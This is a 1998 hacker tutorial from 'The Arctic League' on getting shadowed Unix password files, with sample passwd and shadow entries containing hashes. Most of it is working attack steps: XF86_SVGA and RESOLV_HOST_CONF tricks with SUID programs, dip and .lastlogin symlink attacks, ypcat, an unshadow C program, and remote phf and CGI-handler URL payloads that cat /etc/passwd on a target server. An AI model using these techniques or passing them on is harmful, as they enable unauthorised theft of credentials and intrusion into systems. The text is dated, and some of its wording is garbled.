The Shadowed Passwd by The Arctic League - http://arctik.com In the old days hacking was easy. You get an account on a system, download the passwd file, and crack the passwords. As you may have noticed everyone figured out that unshadowed passwd files were not as secure as they thought. So some at (find where) invented the idea of shadowed passwds. With a non-shadowed passwd file the file /etc/passwd looks like this: root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:-2:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash guest:*:405:100:guest:/dev/null:/dev/null bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash Quick little note about the normal passwd file: mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash 1 :2 :3 :4 :5 :6 :7 1=username 2=encrypted password 3=user number 4=groop id 5=real name 6=home directory 7=shell On a system with passwd shadowing it would look like this: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: man:x:13:15:man:/usr/man: postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash nobody:x:-2:100:nobody:/dev/null: ftp:x:404:1::/home/ftp:/bin/bash guest:x:405:100:guest:/dev/null:/dev/null bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash web:x:502:100:Web Master:/home/web:/bin/bash mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash This type of passwd file is impossable to crack, for the simple resion that there is nothing to crack! The real encrypted passwords are stored in different files on different systems, but the most common is in /etc/shadow. /etc/shadow will look something like this: root:R0rmc6lxVwi5I:10441:0:99999:7::: bin:*:10441:0:99999:7::: daemon:*:10441:0:99999:7::: adm:*:10441:0:99999:7::: lp:*:10441:0:99999:7::: sync:*:10441:0:99999:7::: shutdown:*:10441:0:99999:7::: halt:*:10441:0:99999:7::: mail:*:10441:0:99999:7::: news:*:10441:0:99999:7::: uucp:*:10441:0:99999:7::: operator:*:10441:0:99999:7::: games:*:10441:0:99999:7::: gopher:*:10441:0:99999:7::: ftp:*:10441:0:99999:7::: nobody:*:10441:0:99999:7::: mary:EauDLA/PT/HQg:10441:0:99999:7::: bhilton:LkjLiWy08xIWY:10446:-1:-1:-1:-1:-1:134529076 There are many ways to unshadow a shadowed passwd file. I will go over a few of them here. The First way to get the /etc/shadow file on a linux system is to do the command: XF86_SVGA -config /etc/shadow Because of a bug in some versions of the configurater it will echo /etc/shadow to your term. This bug is in almost all Linux Slackware 3.3 systems and maybe anything that runs XFREE86. In most linux versions there is a hole in libc 5.4.7 or less, that let you set your resolv_hots_conf to any file on the system. If you were then to run a SUID program that uses resolv_host_conf, ping for example, it would cat the file to you. One of these files will be suid: ping, traceroute, rlogin, or, ssh 1. Type bash to start a bash shell 2. Type: export RESOLV_HOST_CONF=/etc/shadow 3. Type one of the file names above with asdf, like this: ping asdf It should cat the shadowed passwd file for you. Note: you can replace /etc/shadow with any file you want to read. On some Linux Slackwares you can use dip to exploit root, it can also be used to get the shadow file. ln -s /etc/shadow /tmp/dummy.dip /sbin/dip -v /tmp/dummy.dip If dip is vulnerable this will type the shadow file. An old SCO and Sys V trick is the .lastlogin hack. Check to see that in your home directory, the .lastlogin file is owned by auth or root. To exploit: rm -f ~/.lastlogin ln -s ~/.lastlogin /etc/passwd Now logout and then back in so you create the link. cat .lastlogin > passwd rm -f ~/.lastlogin Another old trick that still works once and a while is the ypcat hack. It works on some SunOS, SCO, and System Vs. To use it simply type ypcat /etc/passwd with your capture option turned on. The most widly known shadow hack is using lots of calls to the pw_*'s to get the file. The unshadow C program works on some versions of Unix, mostly on the same ones that ypcat works on. -------unshadow.c cut here---------------- #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } ---------End here------------------ Web & cgi exploits: Any OS running a web server with /cgi-bin/phf executable is open to attack. The phf cgi calls the program ph, if you send a CR char to it, it will let you execute commands on the system. (This is a remote hack) http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd or http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd Any OS (Usually IRIX) running a web server with /cgi-bin/handler executable is hackable. telnet target.machine.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0 Remember to use a TAB character after cat. (c)1998, The Arctic League - http://arctik.com